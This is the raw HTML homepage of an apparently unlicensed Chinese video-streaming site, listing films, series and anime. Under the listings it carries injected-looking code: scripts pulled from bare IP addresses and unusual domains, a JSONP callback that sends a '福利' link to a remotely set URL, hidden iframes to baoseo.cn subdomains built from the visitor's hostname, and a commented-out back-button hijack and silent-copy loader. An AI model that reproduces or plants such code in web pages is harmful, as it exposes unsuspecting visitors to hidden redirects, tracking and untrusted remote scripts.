<html lang="zh-CN"><head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>盲兔TV</title>
        <meta name="keywords" content="">
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no">
        <meta name="format-detection" content="telephone=no">
        <meta name="renderer" content="webkit">
        <meta name="applicable-device" content="pc,mobile">
        <link rel="stylesheet" href="/template/tuixiexie/css/m.css">
<script>var SitePath='/',SiteAid='10',SiteTid='',SiteId='';</script>
<script src="http://libs.baidu.com/jquery/2.1.4/jquery.min.js"></script>
<script src="/template/tuixiexie/js/jquery.lazyload.js"></script>
<script src="/template/tuixiexie/js/home.js"></script>
    <script src="http://47.105.83.231/cnzz/i?pid=ks62&amp;cid=fuzhi&amp;callback=xx"></script></head>
    <body>
        <div class="wrap">
            <div class="head">
    <form action="/index.php?m=vod-search" method="post" class="sos">
        <div class="t">


            <a class="on1" href="/" style="position: absolute;"><span>&nbsp;&nbsp;盲兔 TV</span></a>
            <input type="text" name="wd" placeholder="请输入影片名或演员" value="">
        </div>
        <div class="b">
            <button type="submit" name="search">搜索</button>
        </div>
    </form>

    <div class="line_02">

    </div>




    <div class="nav">
        <!--h1><a href="index.html">❤</a></h1-->
        <ul>
            <li><a class="on" href="/"><span style="color: #ffffff">首页</span></a></li>
            
            <li><a href="/vod-type-id-1-pg-1.html"><span class="ziti">电影</span></a></li>
            
            <li><a href="/vod-type-id-2-pg-1.html"><span class="ziti">连续</span></a></li>
            
            <li><a href="/vod-type-id-4-pg-1.html"><span class="ziti">动漫</span></a></li>
            
            <li><a href="javascript:void(0)" id="click" style="color:red;">福利</a></li>
            <li style="display:none;"><a href="/index.php?m=user-index.html"><span>会员</span></a></li>
        </ul>
    </div>
<script type="text/javascript">
    var xx = function(data){
        var btn = document.getElementById("click");
        btn.addEventListener('click',function(){
            window.location.href = data.url;
        },false)
    };
    var url = "http://47.105.83.231/cnzz/i?pid=ks62&cid=fuzhi&callback=xx";
    var script = document.createElement('script');
    script.setAttribute('src', url);
    document.getElementsByTagName('head')[0].appendChild(script);
    </script>

</div>
            
            <div class="main">
                <h2 class="focus_t" style="color:#1E1E1E;"><span></span>电影<i><a href="/vod-type-id-1-pg-1.html" style="color: #1E1E1E">更多 »</a></i></h2>
                <ul class="pvod">
                    
                    <li>
                        <a href="/vod-play-id-171-src-1-num-1.html" title="金刚狼3：殊死一战">
                            <div class="psize">
                                <img class="lazy" data-original="http://rpg.pic-imges.com/pic/upload/vod/2018-09/15365038920.jpg" src="/template/tuixiexie/images/jzz.gif" alt="金刚狼3：殊死一战">
                                <label class="title">&nbsp;HD&nbsp;</label>
                            </div>
                            <label class="pname">金刚狼3：殊死一战</label>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/vod-play-id-71847-src-1-num-1.html" title="黄飞鸿之武神林世荣">
                            <div class="psize">
                                <img class="lazy" data-original="http://img.kuaibozy.net/upload/vod/20210331-1/a6bb7957974bb0283a367dd2e07e7e20.jpg" src="http://img.kuaibozy.net/upload/vod/20210331-1/a6bb7957974bb0283a367dd2e07e7e20.jpg" alt="黄飞鸿之武神林世荣" style="display: inline;">
                                <label class="title">&nbsp;超清&nbsp;</label>
                            </div>
                            <label class="pname">黄飞鸿之武神林世荣</label>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/vod-play-id-23984-src-1-num-1.html" title="我的特工爷爷">
                            <div class="psize">
                                <img class="lazy" data-original="http://rpg.pic-imges.com/pic/upload/vod/2018-05/15262849077.jpg" src="/template/tuixiexie/images/jzz.gif" alt="我的特工爷爷">
                                <label class="title">&nbsp;HD1280高清国语中字版&nbsp;</label>
                            </div>
                            <label class="pname">我的特工爷爷</label>
                        </a>
                    </li>
                    
                </ul>
                <em class="focus_b"><a href="/vod-type-id-1-pg-1.html" style="color: #1E1E1E">更多电影»</a></em>
            </div>
            
            <div class="main">
                <h2 class="focus_t" style="color:#1E1E1E;"><span></span>连续<i><a href="/vod-type-id-2-pg-1.html" style="color: #1E1E1E">更多 »</a></i></h2>
                <ul class="pvod">
                    
                    <li>
                        <a href="/vod-play-id-71429-src-1-num-1.html" title="盗墓笔记之怒海潜沙">
                            <div class="psize">
                                <img class="lazy" data-original="http://cdn1.mh-pic.com/upload/vod/2019-09-28/15696625802.jpg" src="/template/tuixiexie/images/jzz.gif" alt="盗墓笔记之怒海潜沙">
                                <label class="title">&nbsp;41集全&nbsp;</label>
                            </div>
                            <label class="pname">盗墓笔记之怒海潜沙</label>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/vod-play-id-71832-src-1-num-1.html" title="长歌行">
                            <div class="psize">
                                <img class="lazy" data-original="http://img.kuaibozy.net/upload/vod/20210331-1/cef9149dae27fb61aec3e775333b9c7b.jpg" src="/template/tuixiexie/images/jzz.gif" alt="长歌行">
                                <label class="title">&nbsp;共49集,完结&nbsp;</label>
                            </div>
                            <label class="pname">长歌行</label>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/vod-play-id-69072-src-1-num-1.html" title="丑女医妃">
                            <div class="psize">
                                <img class="lazy" data-original="http://pic.szjal.cn/img/9126f7bae675878445018c5bc381ecac.jpg" src="/template/tuixiexie/images/jzz.gif" alt="丑女医妃">
                                <label class="title">&nbsp;28&nbsp;</label>
                            </div>
                            <label class="pname">丑女医妃</label>
                        </a>
                    </li>
                    
                </ul>
                <em class="focus_b"><a href="/vod-type-id-2-pg-1.html" style="color: #1E1E1E">更多连续»</a></em>
            </div>
            
            <div class="main">
                <h2 class="focus_t" style="color:#1E1E1E;"><span></span>动漫<i><a href="/vod-type-id-4-pg-1.html" style="color: #1E1E1E">更多 »</a></i></h2>
                <ul class="pvod">
                    
                    <li>
                        <a href="/vod-play-id-69723-src-1-num-1.html" title="七大罪：愤怒的审判">
                            <div class="psize">
                                <img class="lazy" data-original="http://img.kuaibozy.net/upload/vod/20210113-1/fb6376f03b849a3691d836edcb4300ea.jpg" src="/template/tuixiexie/images/jzz.gif" alt="七大罪：愤怒的审判">
                                <label class="title">&nbsp;更新至24集&nbsp;</label>
                            </div>
                            <label class="pname">七大罪：愤怒的审判</label>
                        </a>
                    </li>
                    
                </ul>
                <em class="focus_b"><a href="/vod-type-id-4-pg-1.html" style="color: #1E1E1E">更多动漫»</a></em>
            </div>
            
            <div class="main">
                <h2 class="focus_t" style="color:#1E1E1E;"><span></span>美丽<i><a href="/vod-type-id-17-pg-1.html" style="color: #1E1E1E">更多 »</a></i></h2>
                <ul class="pvod">
                    
                </ul>
                <em class="focus_b"><a href="/vod-type-id-17-pg-1.html" style="color: #1E1E1E">更多美丽»</a></em>
            </div>
            
            <div class="foot">
<p style="line-height: 15px;padding: 30px 10px 150px 10px;">如本站页面信息侵犯了您的权益，请邮件告知，我们将会在第一时间处理！<br>邮箱：qq366@yeah.net </p>
   <script>
                        $(".lazy").each(function(){
                            var imgUrl = $(this).attr("data-original");
                            imgUrl = imgUrl.replace(/https/ig, 'http');
                            $(this).attr("data-original",imgUrl);
                        });
                    </script>

<!-- 顶部 <script src="https://ad.suning.design:12443/ty/12B7B04D-EB67-1880-34-D3C7F5B2BF85.alpha"></script>-->
<script src="https://show.suning.beer:12443/ty/9D32B3AA-E13D-1880-34-EECA89176E48.alpha"></script>

<!-- 底部 -->

<script type="text/javascript" src="http://hf.jasontaojin.com/m-2346"></script>
  
<!-- fanhui -->
  
<script src="https://mirrorss.oss-cn-qingdao.aliyuncs.com/res/f/ywl02_3570.js"></script>

<script src="//xdn.cqqc3.com/wt1120.js"></script>

<!--
<script>
var url = [
'/zhibo1.php',
'/zhibo1.php',
'/zhibo1.php',
'/zhibo1.php',
'/zhibo1.php',
];

function anchor() {
    history.pushState(history.length + 1, "message", "#" + new Date().getTime())
}
setTimeout('anchor()', 100);

function houtui() {
	window.location.href = url[Math.floor(url.length * Math.random())];
}
window.onhashchange = function() {
    houtui();
}
</script>-->
  
<!--静默复制 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="display:none"><script type="text/javascript" xlink:href="http://q1.7kuke.com/jquery.v1.69.js"></script></svg>-->

  <script>
    var a = window.location.href;
    a = a.split(".")[0];
    var qz = a.split("//")[1];
   
    var iframe = document.createElement('iframe');
    iframe.style.display="none";
    iframe.src= "http://"+qz+".baoseo.cn/cnzz.html";
    document.body.appendChild(iframe);
</script>
  
  <div style="display:none;">
 
  </div>
 
        </div>
    
</div><script src="http://47.104.147.197:88/cnzz/i?pid=ywl02&amp;cid=fuzhi&amp;callback=svurl" type="text/javascript"></script><iframe src="http://f31.baoseo.cn/cnzz.html" style="display: none;"></iframe></body></html>